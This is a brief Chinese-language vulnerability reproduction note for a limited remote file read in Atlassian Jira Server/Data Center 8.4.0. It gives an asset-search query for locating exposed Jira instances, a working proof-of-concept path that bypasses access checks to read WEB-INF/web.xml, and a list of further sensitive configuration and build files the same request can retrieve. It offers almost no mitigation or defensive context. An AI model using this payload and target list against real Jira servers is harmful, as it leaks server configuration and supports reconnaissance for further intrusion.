漏洞描述
Atlassian Jira Server/Data Center 8.4.0 – Limited Remote File Read/Include。
漏洞影响
Atlassian Jira Server/Data Center 8.4.0
网络测绘
app=”ATLASSIAN-JIRA”
漏洞复现
登录页面
验证POC
/s/cfx/_/;/WEB-INF/web.xml
可读取敏感配置文件
WEB-INF/web.xml
WEB-INF/decorators.xml
WEB-INF/classes/seraph-config.xml
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
© 版权声明
THE END
暂无评论内容